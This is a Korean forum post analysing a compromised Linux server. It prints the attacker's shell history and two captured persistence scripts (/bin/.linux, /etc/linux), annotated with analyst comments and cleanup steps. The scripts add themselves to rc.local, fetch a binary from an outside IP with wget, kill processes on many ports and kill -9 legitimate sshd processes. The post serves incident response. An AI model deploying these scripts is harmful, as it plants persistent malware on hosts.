.linux sshd
글쓴이 : 최고관리자 날짜 : 2015-08-07 (금) 02:41 조회 : 3537
                             

history
  117  2015-08-07_05:02:23\ ifconfig
  118  2015-08-07_05:02:30\ ss
  119  2015-08-07_05:02:37\ cd .ssh
  120  2015-08-07_05:02:40\ ls
  121  2015-08-07_05:03:25\ cat known_hosts
  .............................................
  .............................................
  130  2015-08-07_05:04:40\ cd /bin
  131  2015-08-07_05:04:50\ wget 168.235.251.156:2211/sshd
  132  2015-08-07_05:05:51\ wget 168.235.251.156:2211/.linux
  133  2015-08-07_05:06:26\ chmod +x sshd
  134  2015-08-07_05:06:30\ chmod +x .linux
  135  2015-08-07_05:06:34\ chattr +i .linux
  136  2015-08-07_05:06:39\ chattr +i sshd
  137  2015-08-07_05:06:45\ /bin/.linux &
  138  2015-08-07_05:06:47\ exit

정상 파일 속성
root@xxx:/bin# lsattr pwd
-------------e-- pwd

변경된 파일 속성 (i = immutable 속성이 설정되어 root 도 삭제·수정 불가)
root@xxx:/bin# lsattr .linux 
----i--------e-- .linux
root@xxx:/bin# lsattr sshd 
----i--------e-- sshd

:: 수정 (chattr -i 로 immutable 속성을 해제해야 파일을 삭제·수정할 수 있음)
root@xxx:/bin# chattr -i .linux 
root@xxx:/bin# chattr -i sshd 
root@xxx:/bin# lsattr sshd 
-------------e-- sshd
root@xxx:/bin# lsattr .linux 
-------------e-- .linux


sshd 파일은 바이너리 파일이고, .linux 파일은 아래와 같은 셸 스크립트

root@xxx:/bin# cat  /bin/.linux
#!/bin/bash
# Captured attacker script (/bin/.linux), reproduced unchanged for analysis.
# It is a persistence watchdog for the dropped binary /bin/sshd:
#   1. it registers itself in /etc/init.d/rc.local so it starts again at boot;
#   2. it loops forever, re-downloading /bin/sshd when the file is missing and
#      restarting it when no such process is running.
# Indicators visible in this script: /bin/.linux, /bin/sshd, the line
# "/bin/.linux &" in /etc/init.d/rc.local, and HTTP fetches from
# 168.235.251.156:2211.
# Cleanup note: deleting /bin/sshd alone is undone on a later pass of the loop
# (it sleeps 200 seconds between passes); the running /bin/.linux process and
# its rc.local entry have to be removed as well.

# Boot persistence: append "/bin/.linux &" to rc.local unless grep returns
# exactly that single line. If rc.local already holds the entry more than once
# (or any other line mentioning /bin/.linux), the string comparison fails and
# another copy is appended, so look for duplicate entries during cleanup.
if [ "/bin/.linux &" = "$(cat /etc/init.d/rc.local | grep /bin/.linux | grep -v grep)" ]; then
    echo ""
else
    echo "/bin/.linux &" >> /etc/init.d/rc.local
fi

# Watchdog loop: never exits on its own.
while [ 1 ]; do
    # Number of processes whose ps line contains "/bin/sshd".
    sshd_killn=$(ps aux | grep "/bin/sshd" | grep -v grep | wc -l)
    if [[ $sshd_killn -eq 0 ]]; then
        # Binary is not running; fetch it again first if the file is gone.
        if [ ! -f "/bin/sshd" ]; then
            if [ -f "/usr/bin/wget" ]; then
                # Works from a private copy of wget in the current directory and
                # deletes it afterwards; the script does not show why the system
                # copy is not used directly.
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://168.235.251.156:2211/sshd
                # Download output is discarded, so nothing appears on a terminal.
                ./wget -P /bin/  http://168.235.251.156:2211/sshd &> /dev/null
                chmod 755 /bin/sshd
                rm wget -rf
                # NOTE(review): the [']...['] pairs below look like the forum's
                # rendering of backticks (command substitution) - confirm against
                # the original file. Read that way, each line kills the process
                # that netstat reports as listening on the given port. Which
                # programs own these ports is not shown on this page; presumably
                # other implants or earlier copies - unverified.
                kill [']netstat -nlp | grep :3699  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10999 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10777 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10771 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10711 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :36001 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :36000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :45000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :25000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :25001 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :4201  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :55555 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :3699  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :2849  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2403  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :34125 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2500  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2405  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
            else
                echo "No wget"
            fi
        fi
        # Started in the background whether or not the download above succeeded.
        /bin/sshd &
        #./sshd &
    elif [[ $sshd_killn -gt 1 ]]; then
        # More than one /bin/sshd process. The PID list here comes from the
        # broader pattern "sshd", so it also contains any legitimate SSH daemon
        # and its session processes. Every listed PID receives kill -9 except
        # the one reached when the counter hits 1. Unexplained SSH disconnects
        # on a host can therefore be a symptom of this script running.
        for killed in $(ps aux | grep "sshd" | grep -v grep | awk '{print $2}'); do
            sshd_killn=$(($sshd_killn-1))
            if [[ $sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        # Exactly one /bin/sshd process: nothing to do this pass.
        echo ""
    fi

    # Interval between checks.
    sleep 200
done


root@xxx:/bin# cat /etc/linux
#!/bin/bash
# Captured attacker script (/etc/linux), reproduced unchanged for analysis.
# It is a second persistence watchdog, this one guarding the dropped binary
# /etc/sshd:
#   1. it registers itself in /etc/init.d/rc.local so it starts again at boot;
#   2. it loops forever, re-downloading /etc/sshd when the file is missing and
#      restarting it when no such process is running.
# Indicators visible in this script: /etc/linux, /etc/sshd, the line
# "/etc/linux &" in /etc/init.d/rc.local, and HTTP fetches from
# 168.235.251.156:2211.
# Cleanup note: deleting /etc/sshd alone is undone on a later pass of the loop
# (it sleeps 60 seconds between passes); the running /etc/linux process and its
# rc.local entry have to be removed as well.

# Boot persistence: append "/etc/linux &" to rc.local unless grep returns
# exactly that single line. If rc.local already holds the entry more than once
# (or any other line mentioning /etc/linux), the string comparison fails and
# another copy is appended, so look for duplicate entries during cleanup.
if [ "/etc/linux &" = "$(cat /etc/init.d/rc.local | grep /etc/linux | grep -v grep)" ]; then
    echo ""
else
    echo "/etc/linux &" >> /etc/init.d/rc.local
fi

# Watchdog loop: never exits on its own.
while [ 1 ]; do
    # Number of processes whose ps line contains "/etc/sshd".
    sshd_killn=$(ps aux | grep "/etc/sshd" | grep -v grep | wc -l)
    if [[ $sshd_killn -eq 0 ]]; then
        # Binary is not running; fetch it again first if the file is gone.
        if [ ! -f "/etc/sshd" ]; then
            if [ -f "/usr/bin/wget" ]; then
                # Works from a private copy of wget in the current directory and
                # deletes it afterwards; the script does not show why the system
                # copy is not used directly.
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://168.235.251.156:2211/sshd
                # Download output is discarded, so nothing appears on a terminal.
                ./wget -P /etc/  http://168.235.251.156:2211/sshd &> /dev/null
                chmod 755 /etc/sshd
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        # Started in the background whether or not the download above succeeded.
        /etc/sshd &
        #./sshd &
    elif [[ $sshd_killn -gt 1 ]]; then
        # More than one /etc/sshd process. The PID list here comes from the
        # broader pattern "sshd", so it also contains any legitimate SSH daemon
        # and its session processes. Every listed PID receives kill -9 except
        # the one reached when the counter hits 1. Unexplained SSH disconnects
        # on a host can therefore be a symptom of this script running.
        for killed in $(ps aux | grep "sshd" | grep -v grep | awk '{print $2}'); do
            sshd_killn=$(($sshd_killn-1))
            if [[ $sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        # Exactly one /etc/sshd process: nothing to do this pass.
        echo ""
    fi

    # Interval between checks.
    sleep 60
done


root@xxx:/bin# cat /etc/init.d/rc.local
......................
......................
/etc/linux &
/bin/.linux &

